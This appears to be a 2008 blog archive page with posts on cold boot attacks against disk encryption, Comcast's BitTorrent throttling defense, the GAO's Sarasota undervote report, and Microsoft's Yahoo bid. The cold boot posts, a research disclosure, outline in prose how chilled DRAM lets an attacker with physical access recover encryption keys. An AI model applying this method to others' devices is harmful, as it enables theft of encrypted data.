May 18, 2024

Archives for 2008

Cold Boot Attacks: Vulnerable While Sleeping

Our research on cold boot attacks on disk encryption has generated lots of interesting discussion. A few misconceptions seem to be floating around, though. I want to address one of them today.

As we explain in our paper, laptops are vulnerable when they are “sleeping” or (usually) “hibernating”. Frequently used laptops are almost always in these states when they’re not in active use – when you just close the lid on your laptop and it quiets down, it’s probably sleeping.

When a laptop goes to sleep, all of the data that was in memory stays there, but the rest of the system is shut down. When you re-open the lid of the laptop, the rest of the system is activated, and the system goes on running, using the same memory contents as before. (Hibernating is similar, but the contents of memory are copied off to the hard drive instead, then brought back from the hard drive when you re-awaken the machine.) People put their laptops to sleep, rather than shutting them down entirely, because a sleeping machine can wake up in seconds with all of the programs still running, while a fully shut-down machine will take minutes to reboot.

Now suppose an attacker gets hold of your laptop while it is sleeping, and suppose the laptop is using disk encryption. The attacker can take the laptop back to his lair, and then open the lid. The machine will reawaken, with the same information in memory that was there when you put the machine to sleep – and that information includes the secret key that is used to encrypt the files on your hard disk. The machine may be screen-locked – that is, it may require entry of your password before you can interact with the desktop – but the attacker won’t care. All he cares about is that the encryption key is in memory.

The attacker will then insert a special thumb drive into the laptop, yank out the laptop’s battery, quickly replace the battery, and push the power button to reboot the laptop. The encryption key will still be in memory – the memory will not have lost its contents because the laptop was without power only momentarily while the battery was out. It doesn’t matter how long the laptop takes to reboot, because the memory contents are fading only momentarily while the battery is out. When the laptop boots, software from the thumb drive will read the contents of memory, find the secret encryption key, and proceed to unlock the encrypted files on your hard drive.

In short, the adversary doesn’t need to capture your laptop while the laptop is open and in active use. All he needs is to get your laptop while it is sleeping – which it is probably doing most of the time.

New Research Result: Cold Boot Attacks on Disk Encryption

Today eight colleagues and I are releasing a significant new research result. We show that disk encryption, the standard approach to protecting sensitive data on laptops, can be defeated by relatively simple methods. We demonstrate our methods by using them to defeat three popular disk encryption products: BitLocker, which comes with Windows Vista; FileVault, which comes with MacOS X; and dm-crypt, which is used with Linux. The research team includes J. Alex Halderman, Seth D. Schoen, Nadia Heninger, William Clarkson, William Paul, Joseph A. Calandrino, Ariel J. Feldman, Jacob Appelbaum, and Edward W. Felten.

Our site has links to the paper, an explanatory video, and other materials.

The root of the problem lies in an unexpected property of today’s DRAM memories. DRAMs are the main memory chips used to store data while the system is running. Virtually everybody, including experts, will tell you that DRAM contents are lost when you turn off the power. But this isn’t so. Our research shows that data in DRAM actually fades out gradually over a period of seconds to minutes, enabling an attacker to read the full contents of memory by cutting power and then rebooting into a malicious operating system.

Interestingly, if you cool the DRAM chips, for example by spraying inverted cans of “canned air” dusting spray on them, the chips will retain their contents for much longer. At these temperatures (around -50 °C) you can remove the chips from the computer and let them sit on the table for ten minutes or more, without appreciable loss of data. Cool the chips in liquid nitrogen (-196 °C) and they hold their state for hours at least, without any power. Just put the chips back into a machine and you can read out their contents.

This is deadly for disk encryption products because they rely on keeping master decryption keys in DRAM. This was thought to be safe because the operating system would keep any malicious programs from accessing the keys in memory, and there was no way to get rid of the operating system without cutting power to the machine, which “everybody knew” would cause the keys to be erased.

Our results show that an attacker can cut power to the computer, then power it back up and boot a malicious operating system (from, say, a thumb drive) that copies the contents of memory. Having done that, the attacker can search through the captured memory contents, find any crypto keys that might be there, and use them to start decrypting hard disk contents. We show very effective methods for finding and extracting keys from memory, even if the contents of memory have faded somewhat (i.e., even if some bits of memory were flipped during the power-off interval). If the attacker is worried that memory will fade too quickly, he can chill the DRAM chips before cutting power.

There seems to be no easy fix for these problems. Fundamentally, disk encryption programs now have nowhere safe to store their keys. Today’s Trusted Computing hardware does not seem to help; for example, we can defeat BitLocker despite its use of a Trusted Platform Module.

For more details, see the paper site.

Comcast's Disappointing Defense

Last week, Comcast offered a defense in the FCC proceeding challenging the technical limitations it had placed on BitTorrent traffic in its network. (Back in October, I wrote twice about Comcast’s actions.)

The key battle line is whether Comcast is just managing its network reasonably in the face of routine network congestion, as it claims, or whether it is singling out certain kinds of traffic for unnecessary discrimination, as its critics claim. The FCC process has generated lots of verbiage, which I can’t hope to discuss, or even summarize, in this post.

I do want to call out one aspect of Comcast’s filing: the flimsiness of its technical argument.

Here’s one example (p. 14-15).

As Congresswoman Mary Bono Mack recently explained:

The service providers are watching more and more of their network monopolized by P2P bandwidth hogs who command a disproportionate amount of their network resources. . . . You might be asking yourself, why don’t the broadband service providers invest more into their networks and add more capacity? For the record, broadband service providers are investing in their networks, but simply adding more bandwidth does not solve [the P2P problem]. The reason for this is P2P applications are designed to consume as much bandwidth as is available, thus more capacity only results in more consumption.

(emphasis in original). The flaws in this argument start with the fact that the italicized segment is wrong. P2P protocols don’t aim to use more bandwidth rather than less. They’re not sparing with bandwidth, but they don’t use it for no reason, and there does come a point where they don’t want any more.

But even leaving aside the merits of the argument, what’s most remarkable here is that Comcast’s technical description of BitTorrent cites as evidence not a textbook, nor a standards document, nor a paper from the research literature, nor a paper by the designer of BitTorrent, nor a document from the BitTorrent company, nor the statement of any expert, but a speech by a member of Congress. Congressmembers know many things, but they’re not exactly the first group you would turn to for information about how network protocols work.

This is not the only odd source that Comcast cites. Later (p. 28) they claim that the forged TCP Reset packets that they send shouldn’t be called “forged”. For this proposition they cite some guy named George Ou who blogs at ZDNet. They give no reason why we should believe Mr. Ou on this point. My point isn’t to attack Mr. Ou, who for all I know might actually have some relevant expertise. My point is that if this is the most authoritative citation Comcast can find, then their argument doesn’t look very solid. (And, indeed, it seems pretty uncontroversial to call these particular packets “forged”, given that they mislead the recipient about (1) which IP address sent the packet, and (2) why the packet was sent.)

Comcast is a big company with plenty of resources. It’s a bit depressing that they would file arguments like this with the FCC, an agency smart enough to tell the difference. Is this really the standard of technical argumentation in FCC proceedings?

The continuing saga of Sarasota's lost votes

At a hearing today before a subcommittee of Congress’s Committee on House Administration, the U.S. Government Accountability Office (GAO) reported on the results of their technical investigation into the exceptional undervote rate in the November 2006 election for Florida’s 13th Congressional District.

David Dill and I wrote a long paper about shortcomings in previous investigations, so I’m not going to present a detailed review of the history of this case. [Disclosure: Dill and I were both expert witnesses on behalf of Jennings and the other plaintiffs in the Jennings v. Buchanan case. Writing this blog post, I’m only speaking on my own. I do not speak on behalf of Christine Jennings or anybody else involved with the campaign.]

Heavily abridged history: One in seven votes recorded on Sarasota’s ES&S iVotronic systems in the Congressional race were blank. The margin of victory was radically smaller than this. If you attempt to do a statistical projection from the votes that were cast onto the blank votes, then you inevitably end up with a different candidate seated in Congress.

While I’m not a lawyer, my understanding of Florida election law is that the summary screen, displayed before the voter casts a vote, is what really matters. If the summary screen showed no vote in the race and the voter missed it before casting the ballot, then that’s tough luck for them. If, however, the proper thing was displayed on the summary screen and things went wrong afterward, then there would be a legal basis under Florida law to reverse the election.

Florida’s court system never got far enough to make this call. The judge refused to even allow the plaintiffs access to the machines in order to conduct their own investigation. Consequently, Jennings took her case directly to Congress, which has the power to seat its own members. The last time this particular mechanism was used to overturn an election was in 1985. It’s unclear exactly what standard Congress must use when making a decision like this. Should they use Florida’s standard? Should they impose their own standard? Good question.

Okay, then. On to the GAO’s report. GAO did three tests:

  1. They sampled the machines to make sure the firmware that was inside the machines was the firmware that was supposed to be there. They also “witnessed” the source code being compiled and yielding the same thing as the firmware being used. Nothing surprising was found.
  2. They cast a number of test ballots. Everything worked.
  3. They deliberately miscalibrated some iVotronic systems in a variety of different ways and cast some more test votes. They found the machines were “difficult to use”, but that the summary screens were accurate with respect to the voter’s selections.

What they didn’t do:

  • They didn’t conduct any controlled human subject tests to cast simulated votes. Such a test, while difficult and expensive to perform, would allow us to quantify the extent to which voters are confused by different aspects of the voting system’s user interface.
  • They didn’t examine any of the warehoused machines for evidence of miscalibration. They speculate that grossly miscalibrated machines would have been detected in the field and would have been either recalibrated or taken out of service. They suggest that two such machines were, in fact, taken out of service.
  • They didn’t go through any of ES&S’s internal change logs or trouble tickets. If ES&S knows more, internally, about what may have caused this problem, they’re not saying and GAO was unable to learn more.
  • For the tests that they did conduct, GAO didn’t describe enough about the test setup and execution for us to make a reasonable critique of whether their test setup was done properly.

GAO’s conclusions are actually rather mild. All they’re saying is that they have some confidence that the machines in the field were running the correct software, and that the software doesn’t seem to induce failures. GAO has no opinion on whether poor human factors played a factor, nor do they offer any opinion on what the legal implications of poor human factors would be in terms of who should have won the race. Absent any sort of “smoking gun” (and, yes, 18,000 undervotes apparently didn’t make quite enough smoke on their own), it would seem unlikely that the Committee on House Administration would vote to overturn the election.

Meanwhile, you can expect ES&S and others to use the GAO report as some sort of vindication of the iVotronic, in specific, or of paperless DRE voting systems, in general. Don’t buy it. Even if Sarasota’s extreme undervote rate wasn’t itself sufficient to throw out this specific election result, it still represents compelling evidence that the voting system, as a whole, substantially failed to capture the intent of Sarasota’s voters. Finally, the extreme effort invested by Sarasota County, the State of Florida, and the GAO demonstrates the fundamental problem with the current generation of paperless DRE voting systems: when problems occur, it’s exceptionally difficult to diagnose them. There simply isn’t enough information left behind to determine what really happened during the election.

Other articles on today’s news: CNet News, Bradeton Herald, Sarasota Herald-Tribune, NetworkWorld, Miami Herald (AP wire story), VoteTrustUSA

UPDATE (2/12): Ted Selker (MIT Media Lab) has a press release online that describes human factors experiments with a Flash-based mock-up of the Sarasota CD-13 ballot. They appear to have found undervote rates of comparable magnitude to those obvserved in Sarasota. A press release is very different from a proper technical report, much less a conference or journal publication, so it’s inappropriate to look to this press release as “proof” of any sort of “ballot blindness” effect.

Google Objects to Microhoo: Pot Calling Kettle Black?

Last week Microsoft offered to buy Yahoo at a big premium over Yahoo’s current stock price; and Google complained vehemently that Microsoft’s purchase of Yahoo would reduce competition. There’s been tons of commentary about this. Here’s mine.

The first question to ask is why Microsoft made such a high offer for Yahoo. One possibility is that Microsoft thinks the market had drastically undervalued Yahoo, making it a good investment even at a big markup. This seems unlikely.

A more plausible theory is that Microsoft thinks Yahoo is a lot more valuable when combined with Microsoft than it would be on its own. Why might this be? There are two plausible theories.

The synergy theory says that combining Yahoo’s businesses with Microsoft’s businesses creates lots of extra value, that is that the whole is much more profitable than the parts would be separately.

The market structure theory says that Microsoft benefits from Yahoo’s presence in the market (as a counterweight to Google), that Microsoft worried that Yahoo’s market position was starting to slip, so Microsoft acted to prop up Yahoo by giving Yahoo credible access to capital and strong management. In this theory, Microsoft cares less (or not at all) about actually combining the businesses, and wants mostly to keep Google from capturing Yahoo’s market share.

My guess is that both theories have some merit – that Microsoft’s offer is both offensive (seeking synergies) and defensive (maintaining market structure).

Google objected almost immediately that a Microsoft-Yahoo merger would reduce competition to the extent that government should intervene to block the merger or restrict the conduct of the merged entity. The commentary on Google’s complaint has focused on two points. First, at least in some markets, two-way competition between Microhoo and Google might be more vigorous than the current three-way competition between a dominant Google and two rivals. Second, even assuming that the antitrust authorities ultimately reject Google’s argument and allow the merger to proceed, government scrutiny will delay the merger and distract Microsoft and Yahoo, thereby helping Google.

Complaining has downsides for Google too – a government skeptical of acquisitions by dominant high-tech companies could easily boomerang and cause Google its own antitrust headaches down the road.

So why is Google complaining, despite this risk? The most intriguing possibility is that Google is working the refs. Athletes and coaches often complain to the referee about a call, knowing that the ref won’t change the call, but hoping to generate some sympathy that will pay off next time a close call has to be made. Suppose Google complains, and the government rejects its complaint. Next time Google makes an acquisition and the government comes starts asking questions, Google can argue that if the government didn’t do anything about the Microhoo merger, then it should lay off Google too.

It’s fun to toss around these Machiavellian theories, but I doubt Google actually thought all this through before it reacted. Whatever the explanation, now that it has reacted, it’s stuck with the consequences of its reaction – just as Microsoft is stuck, for better or worse, with its offer to buy Yahoo.